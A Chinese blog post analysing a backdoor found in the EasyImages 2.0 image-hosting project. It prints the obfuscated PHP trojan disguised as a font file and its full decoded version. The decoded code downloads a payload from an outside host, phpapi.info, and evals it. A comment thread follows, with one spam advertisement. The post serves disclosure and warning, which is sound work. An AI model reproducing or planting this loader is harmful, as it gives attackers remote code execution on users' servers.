始于初见,止于终老

(已修复)EasyImages项目疑似被盗,挂马文件分析

4月17日更新

开发者确认本地设备感染,git已回滚清除挂马文件,请大家放心使用。


有朋友使用EasyImages项目(https://github.com/icret/EasyImages2.0),最近一次的更新中杀毒软件报毒木马文件。已经发布Issue预警,暂未收到回复。

具体文件在public/static/fonts/fontawesome-wmebfont.php

源文件

<?php 
$password='CQtlsC';
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/

解码复原

<?php 
$password='CQtlsC';
error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
   $c = '';
   $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
   $url = 'http://phpapi.info/404.gif';
   $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
   if (function_exists('fsockopen')) {
       $link = parse_url($url);
       $query = $link['path'];
       $host = strtolower($link['host']);
       $fp = fsockopen($host, 80, $errno, $errstr, 10);
       if ($fp) {
           $out = "GET /{$query} HTTP/1.0\n";
           $out .= "Host: {$host}\n";
           $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n";
           $out .= "Connection: Close\n\n";
           fwrite($fp, $out);
           $inheader = 1;
           $contents = "";
           while (!feof($fp)) {
               $line = fgets($fp, 4096);
               if ($inheader == 0) {
                   $contents .= $line;
               }
               if ($inheader && ($line == "\n" || $line == "\n")) {
                   $inheader = 0;
               }
           }
           fclose($fp);
           $c = $contents;
       }
   }
   if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
       $ch = curl_init();
       curl_setopt($ch, CURLOPT_URL, $url);
       curl_setopt($ch, CURLOPT_TIMEOUT, 15);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
       curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
       $c = curl_exec($ch);
       curl_close($ch);
   }
   if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
       $temps = @file($url);
       if (!empty($temps))
           $c = @implode('', $temps);
       if (!strpos($c, "delDirAndFile"))
           $c = @file_get_contents($url);
   }
   if (strpos($c, $urlNew) !== false) {
       $c = str_replace($urlNew, "", $c);
       $_SESSION["phpapi"] = gzinflate(base64_decode($c));
   }
}
if (isset($_SESSION["phpapi"])) {
   eval($_SESSION["phpapi"]);
}

添加新评论

可用标签:<img> <b> <u> <i>

已有 5 条评论

  1. j5d j5d

    买单号 买快递单号 买空包 代发选爱查www.aickd.com

  2. 大力顶起。。。。

  3. 已经查到了,是由于我用了破解的sublime text3导致木马感染,对此深表抱歉。
    之前我一直是在自己发服务器端更新,很少更新git(详细请看:https://img.545141.com/)
    本次更新主要是适配php 7.4及以上版本(此前2.0.2.0是不支持7.4的);
    对此产生的问题本人深表抱歉!

    不过这个木马太老了,只要是php7.2及以上就无法使用。

    我自己测试了下,php7.0我也没成功

    1. Syc Syc

      小马使用了create_function函数,高版本已废除。低版本(PHP5.X)的用户,也是碰运气。一般使用LNMP一键包等,该函数也是列入禁用。

      1. 那应该没事,因为我这低版本的也运行不了。。

Top